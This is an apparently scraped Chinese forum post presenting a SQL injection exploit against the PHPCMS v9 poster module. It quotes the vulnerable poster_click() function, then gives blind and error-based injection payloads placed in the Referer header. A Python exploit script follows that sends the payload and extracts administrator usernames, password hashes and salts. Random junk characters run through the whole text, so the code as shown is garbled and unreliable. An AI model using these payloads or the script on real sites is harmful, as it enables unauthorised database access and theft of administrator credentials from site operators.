' S9 ^5 A7 y- |0 a. {问题函数\phpcms\modules\poster\index.php ! I2 X/ ?' {# _" h9 m' o; s + Z2 r- Z: c W4 P% h5 t- h6 Xpublic function poster_click() {* H3 J- J* O- l9 Q3 f- g' L1 G M
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;. |# w% N, r. E2 S# w8 Z% m" k
$r = $this->db->get_one(array('id'=>$id)); B. S" I) K7 ^; Q' S- j- M, E2 Pif (!is_array($r) && empty($r)) return false;5 {( R# R" E+ p0 z) O. K* E0 U
$ip_area = pc_base::load_sys_class('ip_area'); $ R: |6 B4 m3 P7 n) b$ip = ip();0 ?4 x' ^2 x; Y; n
$area = $ip_area->get($ip); 4 Y# C7 N, F6 H9 b9 r0 |. z$ V$username = param::get_cookie('username') ? param::get_cookie('username') : '';, _8 u5 r6 L# ]6 |! W q) C3 D# K
if($id) { 7 b/ f& s/ k9 I, T, G$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();8 R8 h+ J/ B* }) |9 b& z
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1)); 5 L6 c# P' f3 t5 k @" }; k# H) j( U}( r# |2 ~5 h& H o$ i) d
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id)); ! P& e! ^' g7 j8 @$setting = string2array($r['setting']); ' z. Q6 h3 {0 G, tif (count($setting)==1) {) m! |9 P" D1 i1 W
$url = $setting['1']['linkurl']; ~ z( n7 b: q1 F6 Z$ f
} else {" `4 r. p5 a; Z5 j$ B
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl']; 2 W; B# g: V5 X/ T. {& U5 }5 Y}2 S: W8 i; {2 j9 j2 @2 b7 X
header('Location: '.$url);! I7 n3 r: {1 ?+ X6 r
} - E D# T" j9 g0 b* m# ~5 w 3 C6 E& S" p4 t4 h' ]0 s 2 w3 Q8 K) \3 e
# e9 ]; L5 v+ r) D, g5 j- Q
利用方式: ; q B+ x7 Q* B7 G6 z* E( I0 | , d# ~+ j) e1 j: x1、可以采用盲注入的手法:" `9 [& k" t9 B1 c
+ y+ Y( E5 n) z1 @+ n3 N Dreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#8 T# n `' u7 q! W7 F7 H1 T
, [1 J* V( n) [/ D
通过返回页面,正常与否一个个猜解密码字段。 ! ^) B6 J E2 M; `+ S9 W* D3 Y1 Q$ a4 K* M
2、代码是花开写的,随手附上了:3 A& Y% {9 \" f1 W* x1 T
# `3 ? f# o" E% p
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#- W& i1 u2 _" D0 O7 ~
6 Z M! W" {. j, K0 e" t6 k' e8 Y此方法是爆错注入手法,原理自查。/ F$ ^3 B/ G, s5 N) k, n, C- L
6 H$ K' V' Z. m) T- r9 I $ g/ Y3 [* i: A: p. H1 ~
7 I4 {, @) o6 |& J* z( l利用程序: 3 i' V. Q% j! ^- y1 l! m % j* p d8 }/ v4 H# D4 A! E#!/usr/bin/env python " I0 M* d. s' U+ k4 fimport httplib,sys,re4 h9 H4 c0 H C& S' i' T: I- \4 M
* x7 D: M9 Q; {: V" D8 P
def attack():0 B7 I& Q/ l- s, _/ h' e, e3 ~: h
print “Code by Pax.Mac Team conqu3r!”% t% c9 u) k- V+ T
print “Welcome to our zone!!!”, f% w: x% f% V% [$ l/ B
url=sys.argv[1] , b* ]) n/ u4 t1 m4 S. \4 I. ]6 h, Zpaths=sys.argv[2] 2 o+ e* z* a' g% Y! ]" M9 j% Mconn = httplib.HTTPConnection(url)* Y- V/ p) T8 O! N2 j( F; }2 W. x
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,: {6 k0 k) }" M; j- q
“Accept”: “text/plain”,' j. A9 P2 @6 m: D) g$ T
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}8 G+ b0 H2 O9 o! J; \
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)% i; e4 l L" d5 X" f; F6 z
r1 = conn.getresponse()4 ?3 v7 O. Q. K0 b) V2 z
datas=r1.read()3 g M& b/ a! o9 ]3 C0 w. b1 |9 i
datas=re.findall(r”Duplicate entry \’\w+’”, datas)) C% S Q7 s& L8 E$ n' j
print datas[0]6 F5 M8 u0 h6 w& o0 l+ A0 F
conn.close() " `: ^- S- z) e# Jif __name__==”__main__”:* |2 l; i1 P( G [
if len(sys.argv)<3:% y7 S- y+ U0 T+ I' k1 }
print “Code by Pax.Mac Team conqu3r” : d" r5 n f; d: r+ fprint “Usgae:”: E. T3 b' n: @& ?/ K* m3 c0 e
print “ phpcmsattack.py www.paxmac.org /” ! P0 }5 ^/ d7 X: O/ H" V0 vprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/” - A* l/ T5 M6 M. a# csys.exit(1) ' a L; ?2 Q! R d8 {attack() O$ b- ^5 g/ W8 |. b0 j* ~ + M* s: B% D, d) l; s/ v% E* j